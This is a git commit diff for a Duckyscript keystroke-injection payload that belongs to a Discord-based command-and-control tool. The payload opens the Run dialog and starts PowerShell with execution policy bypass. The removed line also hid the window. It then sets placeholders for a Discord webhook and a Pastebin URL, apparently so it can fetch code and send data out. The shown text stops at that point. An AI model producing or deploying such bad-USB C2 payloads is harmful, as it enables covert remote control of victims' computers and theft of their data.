Update and rename Discord C2 Client.txt to Discord-C2-Client.txt

This commit is contained in:
beigeworm
2023-11-19 12:53:44 +00:00
committed by GitHub
parent 8bb7c2e27c
commit dc824521fc

View File

@@ -15,11 +15,11 @@ REM for more info goto - https://github.com/beigeworm/PoshCord-C2
REM some setup for dukie script
DEFAULT_DELAY 100
REM open powershell (remove "-W H" to show the window)
REM open powershell
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H
STRING powershell -NoP -Ep Bypass
ENTER
DELAY 5000
STRING $hookurl = 'WEBHOOK_HERE'; $ghurl = 'PASTEBIN_URL_HERE';